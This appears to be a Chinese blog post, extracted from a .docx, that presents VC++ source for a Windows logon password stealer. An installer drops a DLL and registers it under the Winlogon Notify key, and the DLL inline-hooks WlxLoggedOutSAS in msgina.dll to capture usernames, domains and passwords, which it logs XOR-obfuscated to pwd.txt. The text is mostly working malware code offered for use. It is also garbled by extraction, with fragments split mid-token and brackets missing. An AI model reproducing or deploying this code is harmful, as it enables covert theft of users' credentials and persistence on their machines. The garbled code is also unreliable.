VC++实现截获Windows 7密码.docx

1、VC+实现截获Windows 7密码基于VC+2010实现截获Windows 7密码 分类： VC+编程技术 Visual C+2010编程技术 2010-12-17 16:59 744人阅读 评论(1) 收藏 举报 Windows外壳，安装Windows密码截获器view plaincopy to clipboardprint?1. voiddey()/解密 2. 3. printf(/r/n请不要移动原密码文件!);4. system(pause);5. charbuffer10000;6. ZeroMemory(buffer,10000);7. charLogPath255=0;8. G

2、etSystemDirectory(LogPath,MAX_PATH);9. lstrcat(LogPath,/pwd.txt);10. HANDLEhfile=CreateFile(11. LogPath,12. GENERIC_READ,13. FILE_SHARE_WRITE,14. 0,15. OPEN_ALWAYS,16. FILE_ATTRIBUTE_NORMAL,17. 0);18. if(!hfile)19. 20. printf(打开文件失败!);21. return;22. 23. DWORDst;24. inta=ReadFile(hfile,buffer,10000,&

3、st,0);25. if(!a)26. 27. printf(读取失败!);28. return;29. 30. for(inti=0;istrlen(buffer);i+)31. 32. bufferi=bufferi3;33. 34. printf(解密内容为：/r/n%s,buffer);35. return;36. 37. boolinstalled();/判断是否已经安装 38. voidinstalle()/安装函数 39. 40. if(installed()41. 42. printf(已经安装过了!);43. return;44. 45. HRSRChResInfo;46.

4、HGLOBALhResData;47. DWORDdwSize,dwWritten;48. LPBYTEp;49. HANDLEhFile;50. hResInfo=FindResource(NULL,MAKEINTRESOURCE(IDR_DLL1),dll);51. dwSize=SizeofResource(NULL,hResInfo);52. hResData=LoadResource(NULL,hResInfo);53. p=(LPBYTE)GlobalAlloc(GPTR,dwSize);54. CopyMemory(LPVOID)p,(LPCVOID)LockResource(h

5、ResData),dwSize);/定位资源 55. charpfile200;56. GetWindowsDirectory(pfile,200);57. strcat(pfile,/GetPwd.dll);/C:/WINDOWS/58. hFile=CreateFile(pfile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);59. WriteFile(hFile,(LPCVOID)p,dwSize,&dwWritten,NULL);60. CloseHandle(hFile);61. GlobalFree(HGLOBAL)p);62. HKEYh

6、key;63. if(ERROR_SUCCESS=RegCreateKey(HKEY_LOCAL_MACHINE,64. SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon/Notify/GetPwd/,65. &hkey)66. )67. 68. char*name3=dog;69. RegSetValueEx(hkey,dllname,0,REG_SZ,(constunsignedchar*)pfile,strlen(pfile);70. RegSetValueEx(hkey,startup,0,REG_SZ,(constunsigne

7、dchar*)name3,strlen(dog);71. printf(安装成功!);72. 73. else74. 75. printf(安装失败!);76. return;77. 78. 79. boolinstalled()80. 81. HKEYhkey;82. charsz256;83. DWORDdwtype,sl=256;84. if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,85. SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon/Notify/GetPwd,86. NU

8、LL,KEY_ALL_ACCESS,&hkey)/打开失败，表示没有安装 87. )88. 89. RegCloseKey(hkey);90. returnfalse;91. 92. RegCloseKey(hkey);93. returntrue;94. 95. voidusag()/用法提示 96. 97. printf(example:/r/n);98. printf(/r/nInstall:getpwd.exeinstalle);99. printf(/r/nDecryp:getpwd.exeDecryp/r/n);100. 101. intmain(intargc,char*argv

9、)102. 103. if(!lstrcmpi(argv1,installe)/ 104. 105. installe();106. return0;107. 108. elseif(!lstrcmpi(argv1,Decryp)109. 110. dey();111. return0;112. 113. usag();114. return0;115. 密码截获view plaincopy to clipboardprint?1. #defineWLX_SAS_ACTION_LOGON(1) 2. DWORDWINAPIStartHook(LPVOIDlpParameter);3. type

10、defstruct_WLX_MPR_NOTIFY_INFO4. PWSTRpszUserName;5. PWSTRpszDomain;6. PWSTRpszPassword;7. PWSTRpszOldPassword;8. WLX_MPR_NOTIFY_INFO,*PWLX_MPR_NOTIFY_INFO;9. typedefint(WINAPI*WlxLoggedOutSAS)(10. /定义函数原型，以便将数据转发给系统 11. PVOIDpWlxContext,12. DWORDdwSasType,13. PLUIDpAuthenticationId,14. PSIDpLogonSid

11、,15. PDWORDpdwOptions,16. PHANDLEphToken,17. PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,18. PVOID*pProfile19. );20. intWINAPIFunNewADDR(21. PVOIDpWlxContext,22. DWORDdwSasType,23. PLUIDpAuthenticationId,24. PSIDpLogonSid,25. PDWORDpdwOptions,26. PHANDLEphToken,27. PWLX_MPR_NOTIFY_INFOprNotifyInfo,28. PVOID*

12、pProfile);29. /自定义接管WlxLoggedOutSAS的函数，形参保持一致 30. voidWriteLog(31. PWLX_MPR_NOTIFY_INFOpNprNotifyInfo32. );/声明保存用户名密码函数原型 33. intWideToByte(PCHARsz_target,PWSTRsz_source,intsize_ansi);34. voidWriteCurrentTime();35. voidHookWlxLoggedOutSAS();36. /执行HOOK 37. voidUnHookWlxLoggedOutSAS();38. /撤销HOOK 39.

13、 boolisWin2K()/判断操作系统版本 40. 41. DWORDwinVer;42. OSVERSIONINFO*osvi;43. winVer=GetVersion();44. if(winVerdwOSVersionInfoSize=sizeof(OSVERSIONINFO);51. GetVersionEx(osvi);52. if(osvi-dwMajorVersion=5L&osvi-dwMinorVersion=0L)53. 54. free(osvi);55. returntrue;56. 57. 58. 59. free(osvi);60. returnfalse;6

14、1. 62. #pragmapack(1)/对齐字节 63. structHookTable64. HMODULEhMsgina;65. WlxLoggedOutSASOldDDR;66. WlxLoggedOutSASNewADDR;67. unsignedcharOldCode6;68. unsignedcharJmpCode6;69. ;/自定义的结构体 70. HookTablehooktable=71. 0,72. 0,73. &FunNewADDR,74. /x8B/xFF/x55/x8B/xEC,/前5个字节 75. /xE9/x00/x00/x00/x00/e9,jmp 76.

15、 ;77. /*78. #pragmapack() 79. BOOLAPIENTRYDllMain(HANDLEhModule,80. DWORDul_reason_for_call,81. LPVOIDlpReserved82. )83. 84. if(isWin2K()85. /win2K和xp、2003的前五个字节不同 86. 87. hooktable.OldCode0=/x55;88. hooktable.OldCode1=/x8B;89. hooktable.OldCode2=/xEC;90. hooktable.OldCode3=/x83;91. hooktable.OldCod

16、e4=/xEC;92. 93. switch(ul_reason_for_call)94. 95. caseDLL_PROCESS_ATTACH:96. HANDLEhthread=CreateThread(0,97. 0,98. LPTHREAD_START_ROUTINE(StartHook),99. 0,100. 0,101. 0);102. CloseHandle(hthread);103. break;104. 105. returnTRUE;106. 107. DWORDWINAPIStartHook(LPVOIDlpParameter)108. 109. hooktable.hM

17、sgina=GetModuleHandle(_T(msgina.dll);110. if(hooktable.hMsgina=NULL)111. 112. return0;113. 114. hooktable.OldDDR=(WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina,_T(WlxLoggedOutSAS);115. /得到原始函数地址，等下撤销HOOK会用到 116. if(hooktable.OldDDR=NULL)117. 118. return0;119. 120. unsignedchar*p=(unsignedchar*)ho

18、oktable.OldDDR;121. int*OpCode=(int*)&hooktable.JmpCode1;/ 122. intCode=(int)hooktable.NewADDR-(int)hooktable.OldDDR-5;123. *OpCode=Code;124. HookWlxLoggedOutSAS();125. return0;126. 127. voidHookWlxLoggedOutSAS()128. 129. DWORDOldProtect=NULL;130. VirtualProtect(hooktable.OldDDR,131. 5,132. PAGE_EXE

19、CUTE_READWRITE,133. &OldProtect134. );/内存访问权限 135. unsignedchar*p=(unsignedchar*)hooktable.OldDDR;136. for(inti=0;i5;i+)137. 138. pi=hooktable.JmpCodei;139. 140. VirtualProtect(hooktable.OldDDR,141. 5,142. OldProtect,143. &OldProtect144. );145. return;146. 147. voidUnHookWlxLoggedOutSAS()148. 149. D

20、WORDOldProtect=NULL;150. VirtualProtect(hooktable.OldDDR,151. 5,152. PAGE_EXECUTE_READWRITE,153. &OldProtect);154. unsignedchar*p=(unsignedchar*)hooktable.OldDDR;155. for(inti=0;ipszUserName);170. size_u+=lstrlenW(pNprNotifyInfo-pszDomain);171. size_u+=lstrlenW(pNprNotifyInfo-pszPassword);172. size_

21、u+=lstrlenW(pNprNotifyInfo-pszOldPassword);173. unsignedshort*pWBuffer=(unsignedshort*)GlobalAlloc(GMEM_FIXED,size_u+1024);174. unsignedshort*tWBuffer=(unsignedshort*)GlobalAlloc(GMEM_FIXED,size_u+1024);175. charpBuffer11124;176. char*pwd=(char*)GlobalAlloc(GMEM_FIXED,size_u+1024);177. char*pwd2=(ch

22、ar*)GlobalAlloc(GMEM_FIXED,size_u+1024*3);178. ZeroMemory(pWBuffer,size_u+1024);179. ZeroMemory(pBuffer,size_u+1024);180. ZeroMemory(pBuffer1,size_u+1024);181. if(!pBuffer)182. 183. return;184. else185. 186. WriteCurrentTime();187. wsprintfW(pWBuffer,188. L/r/nUser=%s/r/nDomain=%s/r/nPassWord=%s/r/n

23、OldPass=%s/r/n,189. pNprNotifyInfo-pszUserName,190. pNprNotifyInfo-pszDomain,191. pNprNotifyInfo-pszPassword,192. pNprNotifyInfo-pszOldPassword193. );194. WideToByte(pBuffer,195. pWBuffer,196. lstrlenW(pWBuffer)197. );198. 199. charLogPathMAX_PATH=0;200. GetSystemDirectory(LogPath,MAX_PATH);201. lst

24、rcat(LogPath,/pwd.txt);202. HANDLEhfile=CreateFile(203. LogPath,204. GENERIC_WRITE,205. FILE_SHARE_WRITE,206. 0,207. OPEN_ALWAYS,208. FILE_ATTRIBUTE_NORMAL,209. 0);210. if(hfile!=INVALID_HANDLE_VALUE)211. 212. unsignedlongret;213. SetFilePointer(hfile,-1,0,FILE_END);214. inti=0;215. SYSTEMTIMEst;216. intb;217. for(;istrlen(pBuffer);i+)218. 219. pBufferi=pBufferi3;/加密采用异或方式 220. 221. WriteFile(hfile,pBuffer,lstrlen(pBuffer),&ret,0);222. CloseHandle(hfile);223. 2